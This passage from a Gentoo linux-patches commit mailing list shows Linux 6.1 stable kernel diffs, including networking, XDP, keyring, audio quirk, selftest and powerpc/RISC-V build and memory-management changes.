+@@ -28,8 +28,8 @@
+ static LIST_HEAD(mirred_list);
+ static DEFINE_SPINLOCK(mirred_list_lock);
+ 
+-#define MIRRED_RECURSION_LIMIT    4
+-static DEFINE_PER_CPU(unsigned int, mirred_rec_level);
++#define MIRRED_NEST_LIMIT    4
++static DEFINE_PER_CPU(unsigned int, mirred_nest_level);
+ 
+ static bool tcf_mirred_is_act_redirect(int action)
+ {
+@@ -205,12 +205,19 @@ release_idr:
+ 	return err;
+ }
+ 
++static bool is_mirred_nested(void)
++{
++	return unlikely(__this_cpu_read(mirred_nest_level) > 1);
++}
++
+ static int tcf_mirred_forward(bool want_ingress, struct sk_buff *skb)
+ {
+ 	int err;
+ 
+ 	if (!want_ingress)
+ 		err = tcf_dev_queue_xmit(skb, dev_queue_xmit);
++	else if (is_mirred_nested())
++		err = netif_rx(skb);
+ 	else
+ 		err = netif_receive_skb(skb);
+ 
+@@ -224,7 +231,7 @@ static int tcf_mirred_act(struct sk_buff *skb, const struct tc_action *a,
+ 	struct sk_buff *skb2 = skb;
+ 	bool m_mac_header_xmit;
+ 	struct net_device *dev;
+-	unsigned int rec_level;
++	unsigned int nest_level;
+ 	int retval, err = 0;
+ 	bool use_reinsert;
+ 	bool want_ingress;
+@@ -235,11 +242,11 @@ static int tcf_mirred_act(struct sk_buff *skb, const struct tc_action *a,
+ 	int mac_len;
+ 	bool at_nh;
+ 
+-	rec_level = __this_cpu_inc_return(mirred_rec_level);
+-	if (unlikely(rec_level > MIRRED_RECURSION_LIMIT)) {
++	nest_level = __this_cpu_inc_return(mirred_nest_level);
++	if (unlikely(nest_level > MIRRED_NEST_LIMIT)) {
+ 		net_warn_ratelimited("Packet exceeded mirred recursion limit on dev %s\n",
+ 				     netdev_name(skb->dev));
+-		__this_cpu_dec(mirred_rec_level);
++		__this_cpu_dec(mirred_nest_level);
+ 		return TC_ACT_SHOT;
+ 	}
+ 
+@@ -308,7 +315,7 @@ static int tcf_mirred_act(struct sk_buff *skb, const struct tc_action *a,
+ 			err = tcf_mirred_forward(want_ingress, skb);
+ 			if (err)
+ 				tcf_action_inc_overlimit_qstats(&m->common);
+-			__this_cpu_dec(mirred_rec_level);
++			__this_cpu_dec(mirred_nest_level);
+ 			return TC_ACT_CONSUMED;
+ 		}
+ 	}
+@@ -320,7 +327,7 @@ out:
+ 		if (tcf_mirred_is_act_redirect(m_eaction))
+ 			retval = TC_ACT_SHOT;
+ 	}
+-	__this_cpu_dec(mirred_rec_level);
++	__this_cpu_dec(mirred_nest_level);
+ 
+ 	return retval;
+ }
+diff --git a/net/xdp/xdp_umem.c b/net/xdp/xdp_umem.c
+index 4681e8e8ad943..02207e852d796 100644
+--- a/net/xdp/xdp_umem.c
++++ b/net/xdp/xdp_umem.c
+@@ -150,10 +150,11 @@ static int xdp_umem_account_pages(struct xdp_umem *umem)
+ 
+ static int xdp_umem_reg(struct xdp_umem *umem, struct xdp_umem_reg *mr)
+ {
+-	u32 npgs_rem, chunk_size = mr->chunk_size, headroom = mr->headroom;
+ 	bool unaligned_chunks = mr->flags & XDP_UMEM_UNALIGNED_CHUNK_FLAG;
+-	u64 npgs, addr = mr->addr, size = mr->len;
+-	unsigned int chunks, chunks_rem;
++	u32 chunk_size = mr->chunk_size, headroom = mr->headroom;
++	u64 addr = mr->addr, size = mr->len;
++	u32 chunks_rem, npgs_rem;
++	u64 chunks, npgs;
+ 	int err;
+ 
+ 	if (chunk_size < XDP_UMEM_MIN_CHUNK_SIZE || chunk_size > PAGE_SIZE) {
+@@ -188,8 +189,8 @@ static int xdp_umem_reg(struct xdp_umem *umem, struct xdp_umem_reg *mr)
+ 	if (npgs > U32_MAX)
+ 		return -EINVAL;
+ 
+-	chunks = (unsigned int)div_u64_rem(size, chunk_size, &chunks_rem);
+-	if (chunks == 0)
++	chunks = div_u64_rem(size, chunk_size, &chunks_rem);
++	if (!chunks || chunks > U32_MAX)
+ 		return -EINVAL;
+ 
+ 	if (!unaligned_chunks && chunks_rem)
+@@ -202,7 +203,7 @@ static int xdp_umem_reg(struct xdp_umem *umem, struct xdp_umem_reg *mr)
+ 	umem->headroom = headroom;
+ 	umem->chunk_size = chunk_size;
+ 	umem->chunks = chunks;
+-	umem->npgs = (u32)npgs;
++	umem->npgs = npgs;
+ 	umem->pgs = NULL;
+ 	umem->user = NULL;
+ 	umem->flags = mr->flags;
+diff --git a/security/keys/request_key.c b/security/keys/request_key.c
+index 2da4404276f0f..07a0ef2baacd8 100644
+--- a/security/keys/request_key.c
++++ b/security/keys/request_key.c
+@@ -38,9 +38,12 @@ static void cache_requested_key(struct key *key)
+ #ifdef CONFIG_KEYS_REQUEST_CACHE
+ 	struct task_struct *t = current;
+ 
+-	key_put(t->cached_requested_key);
+-	t->cached_requested_key = key_get(key);
+-	set_tsk_thread_flag(t, TIF_NOTIFY_RESUME);
++	/* Do not cache key if it is a kernel thread */
++	if (!(t->flags & PF_KTHREAD)) {
++		key_put(t->cached_requested_key);
++		t->cached_requested_key = key_get(key);
++		set_tsk_thread_flag(t, TIF_NOTIFY_RESUME);
++	}
+ #endif
+ }
+ 
+diff --git a/sound/soc/amd/yc/acp6x-mach.c b/sound/soc/amd/yc/acp6x-mach.c
+index 36314753923b8..4a69ce702360c 100644
+--- a/sound/soc/amd/yc/acp6x-mach.c
++++ b/sound/soc/amd/yc/acp6x-mach.c
+@@ -255,6 +255,20 @@ static const struct dmi_system_id yc_acp_quirk_table[] = {
+ 			DMI_MATCH(DMI_PRODUCT_NAME, "15NBC1011"),
+ 		}
+ 	},
++	{
++		.driver_data = &acp6x_card,
++		.matches = {
++			DMI_MATCH(DMI_BOARD_VENDOR, "HP"),
++			DMI_MATCH(DMI_PRODUCT_NAME, "OMEN by HP Gaming Laptop 16z-n000"),
++		}
++	},
++	{
++		.driver_data = &acp6x_card,
++		.matches = {
++			DMI_MATCH(DMI_BOARD_VENDOR, "HP"),
++			DMI_MATCH(DMI_BOARD_NAME, "8A43"),
++		}
++	},
+ 	{}
+ };
+ 
+diff --git a/tools/bootconfig/test-bootconfig.sh b/tools/bootconfig/test-bootconfig.sh
+index f68e2e9eef8b2..a2c484c243f5d 100755
+--- a/tools/bootconfig/test-bootconfig.sh
++++ b/tools/bootconfig/test-bootconfig.sh
+@@ -87,10 +87,14 @@ xfail grep -i "error" $OUTFILE
+ 
+ echo "Max node number check"
+ 
+-echo -n > $TEMPCONF
+-for i in `seq 1 1024` ; do
+-   echo "node$i" >> $TEMPCONF
+-done
++awk '
++BEGIN {
++  for (i = 0; i < 26; i += 1)
++      printf("%c\n", 65 + i % 26)
++  for (i = 26; i < 8192; i += 1)
++      printf("%c%c%c\n", 65 + i % 26, 65 + (i / 26) % 26, 65 + (i / 26 / 26))
++}
++' > $TEMPCONF
+ xpass $BOOTCONF -a $TEMPCONF $INITRD
+ 
+ echo "badnode" >> $TEMPCONF
+diff --git a/tools/testing/selftests/bpf/prog_tests/btf.c b/tools/testing/selftests/bpf/prog_tests/btf.c
+index 24dd6214394e0..d711f4bea98ea 100644
+--- a/tools/testing/selftests/bpf/prog_tests/btf.c
++++ b/tools/testing/selftests/bpf/prog_tests/btf.c
+@@ -879,6 +879,34 @@ static struct btf_raw_test raw_tests[] = {
+ 	.btf_load_err = true,
+ 	.err_str = "Invalid elem",
+ },
++{
++	.descr = "var after datasec, ptr followed by modifier",
++	.raw_types = {
++		/* .bss section */				/* [1] */
++		BTF_TYPE_ENC(NAME_TBD, BTF_INFO_ENC(BTF_KIND_DATASEC, 0, 2),
++			sizeof(void*)+4),
++		BTF_VAR_SECINFO_ENC(4, 0, sizeof(void*)),
++		BTF_VAR_SECINFO_ENC(6, sizeof(void*), 4),
++		/* int */					/* [2] */
++		BTF_TYPE_INT_ENC(0, BTF_INT_SIGNED, 0, 32, 4),
++		/* int* */					/* [3] */
++		BTF_TYPE_ENC(0, BTF_INFO_ENC(BTF_KIND_PTR, 0, 0), 2),
++		BTF_VAR_ENC(NAME_TBD, 3, 0),			/* [4] */
++		/* const int */					/* [5] */
++		BTF_TYPE_ENC(0, BTF_INFO_ENC(BTF_KIND_CONST, 0, 0), 2),
++		BTF_VAR_ENC(NAME_TBD, 5, 0),			/* [6] */
++		BTF_END_RAW,
++	},
++	.str_sec = "\0a\0b\0c\0",
++	.str_sec_size = sizeof("\0a\0b\0c\0"),
++	.map_type = BPF_MAP_TYPE_ARRAY,
++	.map_name = ".bss",
++	.key_size = sizeof(int),
++	.value_size = sizeof(void*)+4,
++	.key_type_id = 0,
++	.value_type_id = 1,
++	.max_entries = 1,
++},
+ /* Test member exceeds the size of struct.
+  *
+  * struct A {
+diff --git a/tools/testing/selftests/net/forwarding/tc_actions.sh b/tools/testing/selftests/net/forwarding/tc_actions.sh
+index 1e0a62f638fec..919c0dd9fe4bc 100755
+--- a/tools/testing/selftests/net/forwarding/tc_actions.sh
++++ b/tools/testing/selftests/net/forwarding/tc_actions.sh
+@@ -3,7 +3,8 @@
+ 
+ ALL_TESTS="gact_drop_and_ok_test mirred_egress_redirect_test \
+ 	mirred_egress_mirror_test matchall_mirred_egress_mirror_test \
+-	gact_trap_test mirred_egress_to_ingress_test"
++	gact_trap_test mirred_egress_to_ingress_test \
++	mirred_egress_to_ingress_tcp_test"
+ NUM_NETIFS=4
+ source tc_common.sh
+ source lib.sh
+@@ -198,6 +199,52 @@ mirred_egress_to_ingress_test()
+ 	log_test "mirred_egress_to_ingress ($tcflags)"
+ }
+ 
++mirred_egress_to_ingress_tcp_test()
++{
++	local tmpfile=$(mktemp) tmpfile1=$(mktemp)
++
++	RET=0
++	dd conv=sparse status=none if=/dev/zero bs=1M count=2 of=$tmpfile
++	tc filter add dev $h1 protocol ip pref 100 handle 100 egress flower \
++		$tcflags ip_proto tcp src_ip 192.0.2.1 dst_ip 192.0.2.2 \
++			action ct commit nat src addr 192.0.2.2 pipe \
++			action ct clear pipe \
++			action ct commit nat dst addr 192.0.2.1 pipe \
++			action ct clear pipe \
++			action skbedit ptype host pipe \
++			action mirred ingress redirect dev $h1
++	tc filter add dev $h1 protocol ip pref 101 handle 101 egress flower \
++		$tcflags ip_proto icmp \
++			action mirred ingress redirect dev $h1
++	tc filter add dev $h1 protocol ip pref 102 handle 102 ingress flower \
++		ip_proto icmp \
++			action drop
++
++	ip vrf exec v$h1 nc --recv-only -w10 -l -p 12345 -o $tmpfile1  &
++	local rpid=$!
++	ip vrf exec v$h1 nc -w1 --send-only 192.0.2.2 12345 <$tmpfile
++	wait -n $rpid
++	cmp -s $tmpfile $tmpfile1
++	check_err $? "server output check failed"
++
++	$MZ $h1 -c 10 -p 64 -a $h1mac -b $h1mac -A 192.0.2.1 -B 192.0.2.1 \
++		-t icmp "ping,id=42,seq=5" -q
++	tc_check_packets "dev $h1 egress" 101 10
++	check_err $? "didn't mirred redirect ICMP"
++	tc_check_packets "dev $h1 ingress" 102 10
++	check_err $? "didn't drop mirred ICMP"
++	local overlimits=$(tc_rule_stats_get ${h1} 101 egress .overlimits)
++	test ${overlimits} = 10
++	check_err $? "wrong overlimits, expected 10 got ${overlimits}"
++
++	tc filter del dev $h1 egress protocol ip pref 100 handle 100 flower
++	tc filter del dev $h1 egress protocol ip pref 101 handle 101 flower
++	tc filter del dev $h1 ingress protocol ip pref 102 handle 102 flower
++
++	rm -f $tmpfile $tmpfile1
++	log_test "mirred_egress_to_ingress_tcp ($tcflags)"
++}
++
+ setup_prepare()
+ {
+ 	h1=${NETIFS[p1]}
+diff --git a/tools/testing/selftests/x86/amx.c b/tools/testing/selftests/x86/amx.c
+index 625e42901237c..d884fd69dd510 100644
+--- a/tools/testing/selftests/x86/amx.c
++++ b/tools/testing/selftests/x86/amx.c
+@@ -14,8 +14,10 @@
+ #include <sys/auxv.h>
+ #include <sys/mman.h>
+ #include <sys/shm.h>
++#include <sys/ptrace.h>
+ #include <sys/syscall.h>
+ #include <sys/wait.h>
++#include <sys/uio.h>
+ 
+ #include "../kselftest.h" /* For __cpuid_count() */
+ 
+@@ -583,6 +585,13 @@ static void test_dynamic_state(void)
+ 	_exit(0);
+ }
+ 
++static inline int __compare_tiledata_state(struct xsave_buffer *xbuf1, struct xsave_buffer *xbuf2)
++{
++	return memcmp(&xbuf1->bytes[xtiledata.xbuf_offset],
++		      &xbuf2->bytes[xtiledata.xbuf_offset],
++		      xtiledata.size);
++}
++
+ /*
+  * Save current register state and compare it to @xbuf1.'
+  *
+@@ -599,9 +608,7 @@ static inline bool __validate_tiledata_regs(struct xsave_buffer *xbuf1)
+ 		fatal_error("failed to allocate XSAVE buffer\n");
+ 
+ 	xsave(xbuf2, XFEATURE_MASK_XTILEDATA);
+-	ret = memcmp(&xbuf1->bytes[xtiledata.xbuf_offset],
+-		     &xbuf2->bytes[xtiledata.xbuf_offset],
+-		     xtiledata.size);
++	ret = __compare_tiledata_state(xbuf1, xbuf2);
+ 
+ 	free(xbuf2);
+ 
+@@ -826,6 +833,99 @@ static void test_context_switch(void)
+ 	free(finfo);
+ }
+ 
++/* Ptrace test */
++
++/*
++ * Make sure the ptracee has the expanded kernel buffer on the first
++ * use. Then, initialize the state before performing the state
++ * injection from the ptracer.
++ */
++static inline void ptracee_firstuse_tiledata(void)
++{
++	load_rand_tiledata(stashed_xsave);
++	init_xtiledata();
++}
++
++/*
++ * Ptracer injects the randomized tile data state. It also reads
++ * before and after that, which will execute the kernel's state copy
++ * functions. So, the tester is advised to double-check any emitted
++ * kernel messages.
++ */
++static void ptracer_inject_tiledata(pid_t target)
++{
++	struct xsave_buffer *xbuf;
++	struct iovec iov;
++
++	xbuf = alloc_xbuf();
++	if (!xbuf)
++		fatal_error("unable to allocate XSAVE buffer");
++
++	printf("\tRead the init'ed tiledata via ptrace().\n");
++
++	iov.iov_base = xbuf;
++	iov.iov_len = xbuf_size;
++
++	memset(stashed_xsave, 0, xbuf_size);
++
++	if (ptrace(PTRACE_GETREGSET, target, (uint32_t)NT_X86_XSTATE, &iov))
++		fatal_error("PTRACE_GETREGSET");
++
++	if (!__compare_tiledata_state(stashed_xsave, xbuf))
++		printf("[OK]\tThe init'ed tiledata was read from ptracee.\n");
++	else
++		printf("[FAIL]\tThe init'ed tiledata was not read from ptracee.\n");
++
++	printf("\tInject tiledata via ptrace().\n");
++
++	load_rand_tiledata(xbuf);
++
++	memcpy(&stashed_xsave->bytes[xtiledata.xbuf_offset],
++	       &xbuf->bytes[xtiledata.xbuf_offset],
++	       xtiledata.size);
++
++	if (ptrace(PTRACE_SETREGSET, target, (uint32_t)NT_X86_XSTATE, &iov))
++		fatal_error("PTRACE_SETREGSET");
++
++	if (ptrace(PTRACE_GETREGSET, target, (uint32_t)NT_X86_XSTATE, &iov))
++		fatal_error("PTRACE_GETREGSET");
++
++	if (!__compare_tiledata_state(stashed_xsave, xbuf))
++		printf("[OK]\tTiledata was correctly written to ptracee.\n");
++	else
++		printf("[FAIL]\tTiledata was not correctly written to ptracee.\n");
++}
++
++static void test_ptrace(void)
++{
++	pid_t child;
++	int status;
++
++	child = fork();
++	if (child < 0) {
++		err(1, "fork");
++	} else if (!child) {
++		if (ptrace(PTRACE_TRACEME, 0, NULL, NULL))
++			err(1, "PTRACE_TRACEME");
++
++		ptracee_firstuse_tiledata();
++
++		raise(SIGTRAP);
++		_exit(0);
++	}
++
++	do {
++		wait(&status);
++	} while (WSTOPSIG(status) != SIGTRAP);
++
++	ptracer_inject_tiledata(child);
++
++	ptrace(PTRACE_DETACH, child, NULL, NULL);
++	wait(&status);
++	if (!WIFEXITED(status) || WEXITSTATUS(status))
++		err(1, "ptrace test");
++}
++
+ int main(void)
+ {
+ 	/* Check hardware availability at first */
+@@ -846,6 +946,8 @@ int main(void)
+ 	ctxtswtest_config.num_threads = 5;
+ 	test_context_switch();
+ 
++	test_ptrace();
++
+ 	clearhandler(SIGILL);
+ 	free_stashed_xsave();
+ 


^ permalink raw reply related	[flat|nested] 161+ messages in thread
* [gentoo-commits] proj/linux-patches:6.1 commit in: /
@ 2023-03-22 14:15 Alice Ferrazzi
  0 siblings, 0 replies; 161+ messages in thread
From: Alice Ferrazzi @ 2023-03-22 14:15 UTC (permalink / raw
  To: gentoo-commits

commit:     c77ff52621e2516013ea35cbd4c1e4b6e61fa1c6
Author:     Alice Ferrazzi <alicef <AT> gentoo <DOT> org>
AuthorDate: Wed Mar 22 13:47:09 2023 +0000
Commit:     Alice Ferrazzi <alicef <AT> gentoo <DOT> org>
CommitDate: Wed Mar 22 13:47:09 2023 +0000
URL:        https://gitweb.gentoo.org/proj/linux-patches.git/commit/?id=c77ff526

Linux patch 6.1.21

Signed-off-by: Alice Ferrazzi <alicef <AT> gentoo.org>

 0000_README             |    4 +
 1020_linux-6.1.21.patch | 6760 +++++++++++++++++++++++++++++++++++++++++++++++
 2 files changed, 6764 insertions(+)

diff --git a/0000_README b/0000_README
index 4b2b0a69..2837c0f3 100644
--- a/0000_README
+++ b/0000_README
@@ -123,6 +123,10 @@ Patch:  1019_linux-6.1.20.patch
 From:   https://www.kernel.org
 Desc:   Linux 6.1.20
 
+Patch:  1020_linux-6.1.21.patch
+From:   https://www.kernel.org
+Desc:   Linux 6.1.21
+
 Patch:  1500_XATTR_USER_PREFIX.patch
 From:   https://bugs.gentoo.org/show_bug.cgi?id=470644
 Desc:   Support for namespace user.pax.* on tmpfs.

diff --git a/1020_linux-6.1.21.patch b/1020_linux-6.1.21.patch
new file mode 100644
index 00000000..bf455722
--- /dev/null
+++ b/1020_linux-6.1.21.patch
@@ -0,0 +1,6760 @@
+diff --git a/Documentation/filesystems/vfs.rst b/Documentation/filesystems/vfs.rst
+index 2b55f71e2ae19..b5e8b8af8afbb 100644
+--- a/Documentation/filesystems/vfs.rst
++++ b/Documentation/filesystems/vfs.rst
+@@ -1221,7 +1221,7 @@ defined:
+ 	return
+ 	-ECHILD and it will be called again in ref-walk mode.
+ 
+-``_weak_revalidate``
++``d_weak_revalidate``
+ 	called when the VFS needs to revalidate a "jumped" dentry.  This
+ 	is called when a path-walk ends at dentry that was not acquired
+ 	by doing a lookup in the parent directory.  This includes "/",
+diff --git a/Makefile b/Makefile
+index a842ec6d19325..0a9f0770bdf3a 100644
+--- a/Makefile
++++ b/Makefile
+@@ -1,7 +1,7 @@
+ # SPDX-License-Identifier: GPL-2.0
+ VERSION = 6
+ PATCHLEVEL = 1
+-SUBLEVEL = 20
++SUBLEVEL = 21
+ EXTRAVERSION =
+ NAME = Hurr durr I'ma ninja sloth
+ 
+diff --git a/arch/loongarch/kernel/time.c b/arch/loongarch/kernel/time.c
+index 786735dcc8d67..d2b7d5df132a9 100644
+--- a/arch/loongarch/kernel/time.c
++++ b/arch/loongarch/kernel/time.c
+@@ -135,16 +135,17 @@ static int get_timer_irq(void)
+ 
+ int constant_clockevent_init(void)
+ {
+-	int irq;
+ 	unsigned int cpu = smp_processor_id();
+ 	unsigned long min_delta = 0x600;
+ 	unsigned long max_delta = (1UL << 48) - 1;
+ 	struct clock_event_device *cd;
+-	static int timer_irq_installed = 0;
++	static int irq = 0, timer_irq_installed = 0;
+ 
+-	irq = get_timer_irq();
+-	if (irq < 0)
+-		pr_err("Failed to map irq %d (timer)\n", irq);
++	if (!timer_irq_installed) {
++		irq = get_timer_irq();
++		if (irq < 0)
++			pr_err("Failed to map irq %d (timer)\n", irq);
++	}
+ 
+ 	cd = &per_cpu(constant_clockevent_device, cpu);
+ 
+diff --git a/arch/powerpc/Makefile b/arch/powerpc/Makefile
+index 4fd630efe39d3..894d48cd04920 100644
+--- a/arch/powerpc/Makefile
++++ b/arch/powerpc/Makefile
+@@ -146,19 +146,6 @@ CFLAGS-$(CONFIG_PPC32)	+= $(call cc-option, $(MULTIPLEWORD))
+ 
+ CFLAGS-$(CONFIG_PPC32)	+= $(call cc-option,-mno-readonly-in-sdata)
+ 
+-ifdef CONFIG_PPC_BOOK3S_64
+-ifdef CONFIG_CPU_LITTLE_ENDIAN
+-CFLAGS-$(CONFIG_GENERIC_CPU) += -mcpu=power8
+-else
+-CFLAGS-$(CONFIG_GENERIC_CPU) += -mcpu=power4
+-endif
+-CFLAGS-$(CONFIG_GENERIC_CPU) += $(call cc-option,-mtune=power10,	\
+-				  $(call cc-option,-mtune=power9,	\
+-				  $(call cc-option,-mtune=power8)))
+-else ifdef CONFIG_PPC_BOOK3E_64
+-CFLAGS-$(CONFIG_GENERIC_CPU) += -mcpu=powerpc64
+-endif
+-
+ ifdef CONFIG_FUNCTION_TRACER
+ CC_FLAGS_FTRACE := -pg
+ ifdef CONFIG_MPROFILE_KERNEL
+@@ -166,11 +153,12 @@ CC_FLAGS_FTRACE += -mprofile-kernel
+ endif
+ endif
+ 
+-CFLAGS-$(CONFIG_TARGET_CPU_BOOL) += $(call cc-option,-mcpu=$(CONFIG_TARGET_CPU))
+-AFLAGS-$(CONFIG_TARGET_CPU_BOOL) += $(call cc-option,-mcpu=$(CONFIG_TARGET_CPU))
++CFLAGS-$(CONFIG_TARGET_CPU_BOOL) += -mcpu=$(CONFIG_TARGET_CPU)
++AFLAGS-$(CONFIG_TARGET_CPU_BOOL) += -mcpu=$(CONFIG_TARGET_CPU)
+ 
+-CFLAGS-$(CONFIG_E5500_CPU) += $(call cc-option,-mcpu=e500mc64,-mcpu=powerpc64)
+-CFLAGS-$(CONFIG_E6500_CPU) += $(call cc-option,-mcpu=e6500,$(E5500_CPU))
++CFLAGS-$(CONFIG_POWERPC64_CPU) += $(call cc-option,-mtune=power10,	\
++				  $(call cc-option,-mtune=power9,	\
++				  $(call cc-option,-mtune=power8)))
+ 
+ asinstr := $(call as-instr,lis 9$(comma)foo@high,-DHAVE_AS_ATHIGH=1)
+ 
+@@ -213,10 +201,7 @@ KBUILD_CFLAGS += -fno-asynchronous-unwind-tables
+ # often slow when they are implemented at all
+ KBUILD_CFLAGS		+= $(call cc-option,-mno-string)
+ 
+-cpu-as-$(CONFIG_40x)		+= -Wa,-m405
+-cpu-as-$(CONFIG_44x)		+= -Wa,-m440
+ cpu-as-$(CONFIG_ALTIVEC)	+= $(call as-option,-Wa$(comma)-maltivec)
+-cpu-as-$(CONFIG_PPC_E500)		+= -Wa,-me500
+ 
+ # When using '-many -mpower4' gas will first try and find a matching power4
+ # mnemonic and failing that it will allow any valid mnemonic that GAS knows
+@@ -224,7 +209,6 @@ cpu-as-$(CONFIG_PPC_E500)		+= -Wa,-me500
+ # LLVM IAS doesn't understand either flag: https://github.com/ClangBuiltLinux/linux/issues/675
+ # but LLVM IAS only supports ISA >= 2.06 for Book3S 64 anyway...
+ cpu-as-$(CONFIG_PPC_BOOK3S_64)	+= $(call as-option,-Wa$(comma)-mpower4) $(call as-option,-Wa$(comma)-many)
+-cpu-as-$(CONFIG_PPC_E500MC)	+= $(call as-option,-Wa$(comma)-me500mc)
+ 
+ KBUILD_AFLAGS += $(cpu-as-y)
+ KBUILD_CFLAGS += $(cpu-as-y)
+diff --git a/arch/powerpc/boot/Makefile b/arch/powerpc/boot/Makefile
+index d32d95aea5d6f..295f76df13b55 100644
+--- a/arch/powerpc/boot/Makefile
++++ b/arch/powerpc/boot/Makefile
+@@ -39,13 +39,19 @@ BOOTCFLAGS    := -Wall -Wundef -Wstrict-prototypes -Wno-trigraphs \
+ 		 $(LINUXINCLUDE)
+ 
+ ifdef CONFIG_PPC64_BOOT_WRAPPER
+-ifdef CONFIG_CPU_LITTLE_ENDIAN
+-BOOTCFLAGS	+= -m64 -mcpu=powerpc64le
++BOOTCFLAGS	+= -m64
+ else
+-BOOTCFLAGS	+= -m64 -mcpu=powerpc64
++BOOTCFLAGS	+= -m32
+ endif
++
++ifdef CONFIG_TARGET_CPU_BOOL
++BOOTCFLAGS	+= -mcpu=$(CONFIG_TARGET_CPU)
++else ifdef CONFIG_PPC64_BOOT_WRAPPER
++ifdef CONFIG_CPU_LITTLE_ENDIAN
++BOOTCFLAGS	+= -mcpu=powerpc64le
+ else
+-BOOTCFLAGS	+= -m32 -mcpu=powerpc
++BOOTCFLAGS	+= -mcpu=powerpc64
++endif
+ endif
+ 
+ BOOTCFLAGS	+= -isystem $(shell $(BOOTCC) -print-file-name=include)
+diff --git a/arch/powerpc/mm/fault.c b/arch/powerpc/mm/fault.c
+index 2bef19cc1b98c..af46aa88422bf 100644
+--- a/arch/powerpc/mm/fault.c
++++ b/arch/powerpc/mm/fault.c
+@@ -271,11 +271,16 @@ static bool access_error(bool is_write, bool is_exec, struct vm_area_struct *vma
+ 	}
+ 
+ 	/*
+-	 * Check for a read fault.  This could be caused by a read on an
+-	 * inaccessible page (i.e. PROT_NONE), or a Radix MMU execute-only page.
++	 * VM_READ, VM_WRITE and VM_EXEC all imply read permissions, as
++	 * defined in protection_map[].  Read faults can only be caused by
++	 * a PROT_NONE mapping, or with a PROT_EXEC-only mapping on Radix.
+ 	 */
+-	if (unlikely(!(vma->vm_flags & VM_READ)))
++	if (unlikely(!vma_is_accessible(vma)))
+ 		return true;
++
++	if (unlikely(radix_enabled() && ((vma->vm_flags & VM_ACCESS_FLAGS) == VM_EXEC)))
++		return true;
++
+ 	/*
+ 	 * We should ideally do the vma pkey access check here. But in the
+ 	 * fault path, handle_mm_fault() also does the same check. To avoid
+diff --git a/arch/powerpc/platforms/Kconfig.cputype b/arch/powerpc/platforms/Kconfig.cputype
+index 0c4eed9aea806..54d655a647cec 100644
+--- a/arch/powerpc/platforms/Kconfig.cputype
++++ b/arch/powerpc/platforms/Kconfig.cputype
+@@ -118,19 +118,18 @@ endchoice
+ 
+ choice
+ 	prompt "CPU selection"
+-	default GENERIC_CPU
+ 	help
+ 	  This will create a kernel which is optimised for a particular CPU.
+ 	  The resulting kernel may not run on other CPUs, so use this with care.
+ 
+ 	  If unsure, select Generic.
+ 
+-config GENERIC_CPU
++config POWERPC64_CPU
+ 	bool "Generic (POWER5 and PowerPC 970 and above)"
+ 	depends on PPC_BOOK3S_64 && !CPU_LITTLE_ENDIAN
+ 	select PPC_64S_HASH_MMU
+ 
+-config GENERIC_CPU
++config POWERPC64_CPU
+ 	bool "Generic (POWER8 and above)"
+ 	depends on PPC_BOOK3S_64 && CPU_LITTLE_ENDIAN
+ 	select ARCH_HAS_FAST_MULTIPLIER
+@@ -143,6 +142,7 @@ config POWERPC_CPU
+ config CELL_CPU
+ 	bool "Cell Broadband Engine"
+ 	depends on PPC_BOOK3S_64 && !CPU_LITTLE_ENDIAN
++	depends on !CC_IS_CLANG
+ 	select PPC_64S_HASH_MMU
+ 
+ config PPC_970_CPU
+@@ -184,10 +184,12 @@ config E5500_CPU
+ config E6500_CPU
+ 	bool "Freescale e6500"
+ 	depends on PPC64 && PPC_E500
++	depends on !CC_IS_CLANG
+ 
+ config 405_CPU
+ 	bool "40x family"
+ 	depends on 40x
++	depends on !CC_IS_CLANG
+ 
+ config 440_CPU
+ 	bool "440 (44x family)"
+@@ -196,22 +198,27 @@ config 440_CPU
+ config 464_CPU
+ 	bool "464 (44x family)"
+ 	depends on 44x
++	depends on !CC_IS_CLANG
+ 
+ config 476_CPU
+ 	bool "476 (47x family)"
+ 	depends on PPC_47x
++	depends on !CC_IS_CLANG
+ 
+ config 860_CPU
+ 	bool "8xx family"
+ 	depends on PPC_8xx
++	depends on !CC_IS_CLANG
+ 
+ config E300C2_CPU
+ 	bool "e300c2 (832x)"
+ 	depends on PPC_BOOK3S_32
++	depends on !CC_IS_CLANG
+ 
+ config E300C3_CPU
+ 	bool "e300c3 (831x)"
+ 	depends on PPC_BOOK3S_32
++	depends on !CC_IS_CLANG
+ 
+ config G4_CPU
+ 	bool "G4 (74xx)"
+@@ -228,13 +235,12 @@ config E500MC_CPU
+ 
+ config TOOLCHAIN_DEFAULT_CPU
+ 	bool "Rely on the toolchain's implicit default CPU"
+-	depends on PPC32
+ 
+ endchoice
+ 
+ config TARGET_CPU_BOOL
+ 	bool
+-	default !GENERIC_CPU && !TOOLCHAIN_DEFAULT_CPU
++	default !TOOLCHAIN_DEFAULT_CPU
+ 
+ config TARGET_CPU
+ 	string
+@@ -246,6 +252,10 @@ config TARGET_CPU
+ 	default "power8" if POWER8_CPU
+ 	default "power9" if POWER9_CPU
+ 	default "power10" if POWER10_CPU
++	default "e5500" if E5500_CPU
++	default "e6500" if E6500_CPU
++	default "power4" if POWERPC64_CPU && !CPU_LITTLE_ENDIAN
++	default "power8" if POWERPC64_CPU && CPU_LITTLE_ENDIAN
+ 	default "405" if 405_CPU
+ 	default "440" if 440_CPU
+ 	default "464" if 464_CPU
+diff --git a/arch/riscv/include/asm/mmu.h b/arch/riscv/include/asm/mmu.h
+index 5ff1f19fd45c2..0099dc1161683 100644
+--- a/arch/riscv/include/asm/mmu.h
++++ b/arch/riscv/include/asm/mmu.h
+@@ -19,8 +19,6 @@ typedef struct {
+ #ifdef CONFIG_SMP
+ 	/* A local icache flush is needed before user execution can resume. */
+ 	cpumask_t icache_stale_mask;
+-	/* A local tlb flush is needed before user execution can resume. */
+-	cpumask_t tlb_stale_mask;
+ #endif
+ } mm_context_t;
+ 
+diff --git a/arch/riscv/include/asm/tlbflush.h b/arch/riscv/include/asm/tlbflush.h
+index 907b9efd39a87..801019381dea3 100644
+--- a/arch/riscv/include/asm/tlbflush.h
++++ b/arch/riscv/include/asm/tlbflush.h
+@@ -22,24 +22,6 @@ static inline void local_flush_tlb_page(unsigned long addr)
+ {
+ 	ALT_FLUSH_TLB_PAGE(__asm__ __volatile__ ("sfence.vma %0" : : "r" (addr) : "memory"));
+ }
+-
+-static inline void local_flush_tlb_all_asid(unsigned long asid)
+-{
+-	__asm__ __volatile__ ("sfence.vma x0, %0"
+-			:
+-			: "r" (asid)
+-			: "memory");
+-}
+-
+-static inline void local_flush_tlb_page_asid(unsigned long addr,
+-		unsigned long asid)
+-{
